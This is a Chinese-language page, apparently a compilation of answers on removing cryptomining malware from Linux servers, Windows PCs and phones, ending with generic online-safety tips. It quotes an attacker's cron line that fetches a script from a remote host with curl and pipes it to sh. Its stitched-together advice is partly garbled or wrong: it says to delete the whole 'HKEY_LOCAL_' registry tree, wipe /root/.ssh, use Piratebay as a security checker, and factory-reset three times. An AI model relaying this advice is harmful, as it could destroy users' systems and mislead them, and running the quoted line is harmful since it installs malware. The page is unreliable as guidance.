怎樣刪除黑客挖礦

A. 阿里雲伺服器被挖礦了怎麼辦(純純電腦小白

1. 關閉訪問挖礦伺服器的訪問

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd ,取消掉執行許可權， 在沒有找到根源前，千萬不要刪除 minerd，因為刪除了，過一回會自動有生成一個。

3. pkill minerd ,殺掉進程

4. service stop crond 或者 crontab -r 刪除所有的執行計劃

5. 執行top，查看了一會，沒有再發現minerd 進程了。

6.檢查/var/spool/cron/目錄下發現有個root用戶的定時器文件。

下載腳本的語句：

*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件內容如下，感興趣的可以研究下：

View Code

解決minerd並不是最終的目的，主要是要查找問題根源，我的伺服器問題出在了redis服務了，黑客利用了redis的一個漏洞獲得了伺服器的訪問許可權，http://blog.jobbole.com/94518/然後就注入了病毒，下面是解決辦法和清除工作：

1. 修復 redis 的後門,

配置bind選項, 限定可以連接Redis伺服器的IP, 並修改redis的默認埠6379.
配置AUTH, 設置密碼, 密碼會以明文方式保存在redis配置文件中.
配置rename-command CONFIG 「RENAME_CONFIG」, 這樣即使存在未授權訪問, 也能夠給攻擊者使用config指令加大難度
好消息是Redis作者表示將會開發」real user」，區分普通用戶和admin許可權，普通用戶將會被禁止運行某些命令，如conf
2. 打開 ~/.ssh/authorized_keys, 刪除你不認識的賬號

3. 查看你的用戶列表，是不是有你不認識的用戶添加進來。 如果有就刪除掉.

B. 挖礦病毒分析（centos7）

rm -rf /root/.ssh/*
如果有配置過密鑰認證，需要刪除指定的黑客創建的認證文件即可。
ls /proc/10341 查看進程文件

該腳本執行了 /xm 腳本，並且總是會重啟服務。如果此程序不進行清除，即使殺死了對應的進程，過一會還是會執行重新創建，又導致伺服器異常。

因此，先停止啟動腳本配置項：

systemctl disable name.service
刪除腳本：

rm -rf /etc/systemd/system/xm.service

5,啟動腳本刪除完後，刪除相應的程序
ps -ef|grep xmrig
ps -ef|grep javs

kill 9 pid

ls /proc/10341

C. 手機被挖礦怎麼辦

可以使用設備訪問檢測網站（例如 Piratebay）來確認其安全性。

雖然 Chrome 是最常用的瀏覽器，但是 Opera 瀏覽器提供了一些 Chrome 沒有的有趣功能。最新版本的 Opera 瀏覽器能夠自動攔截廣告，此外，它還內置了阻止挖礦的防護功能。這一功能可以阻止網站擅自運行非法挖礦的腳本，這與網頁上的廣告攔截技術並沒有太大區別。

相關信息：

「偷礦」是指未經你同意的情況下，黑客利用你的系統資源挖掘虛擬貨幣。這主要藉助於網站的 Java 代碼，黑客在代碼中注入「偷礦」程序，當你訪問這些代碼時，「偷礦」程序便會偷偷自動運行。

雖然黑客能夠主動入侵網站來運行挖礦腳本，但需要注意的是，那些使用了類似 Coinhive.com 這種插件服務的網站無意中也會給黑客提供更多的可乘之機。

D. 挖礦病毒怎麼排查

登錄系統查看任務管理器，查看佔用內存較大且無法關閉的進程。進程上點擊滑鼠右鍵，打開文件位置（先要在文件夾選項中選擇顯示隱藏文件及操作系文件）。此時你可能會看到有一個Systmss.exe進程和模仿操作系統的svchost.exe進程這里還可以看到一個2.bat文件，右鍵編輯打開這個文件查看，可查看到惡意進程與哪個挖礦組織通信。

通過查看系統操作日誌可分析出病毒的來源、啟動時間等信息，一般原因可能是未關閉3389埠且使用了弱密碼導致黑客遠程登錄上次病毒。

根除病毒：將病毒可執行文件Systmss.exe重命名為Systmss.exe1使病毒無法執行，此時可從任務管理器停止進程。打開注冊表編輯器刪除HKEY_LOCAL_整個目錄。

如果是Linux系統請參考：網頁鏈接

E. 手機要是被當成挖礦機了怎麼辦啊

1、備份重要的數據和照片之後恢復出廠設置吧，不要安裝不明來源的應用，另外許可權設置里也盡量不要授權。

2、可以刷機看一下行不行，還有電腦要按時清理內存才不會卡的。手機內存已經嚴重不足了，建議做輕一些內存方面的清理，然後你的手機再重啟一下就會好了。

3、清除手機數據，如果有重要的東西先保存在網盤上，然後再恢復出廠設置三次，這樣比較安全。

(5)怎樣刪除黑客挖礦擴展閱讀：

1、設置瀏覽器的安全等級。我們常用的瀏覽器都具有安全等級設置功能，通過合理地設置可以有效過濾一些非法網站的訪問限制，從而減少對電腦和個人信息的損害。

2、堅決抵制反動、色情、暴力網站。一方面這些不良信息會影響青少年的身心健康，另一方面很多非法網站會利用瀏覽器漏洞對用戶進行各種攻擊。

3、不要隨意點擊非法鏈接。

4、下載軟體和資料時應選擇正規網站或官方網站。

5、關閉常用通訊軟體中的一些敏感功能。如微信里的「附近的人」、微信隱私里「允許陌生人查看照片」等。

6、不能隨便曬家人及住址照片。長期這樣下去，只要經過別人稍加分析匯總，所曬出來的信息就會成為一套完整的信息，這就暗藏著各種不可預測的風險。

7、不要隨便在網上測試相關信息。有的網站搞調查，問年齡、愛好、性別等等信息，為了一點小利益去做，這些信息就可能被人家利用起來，將信息逐漸總結，賣給別人盈利或威脅到。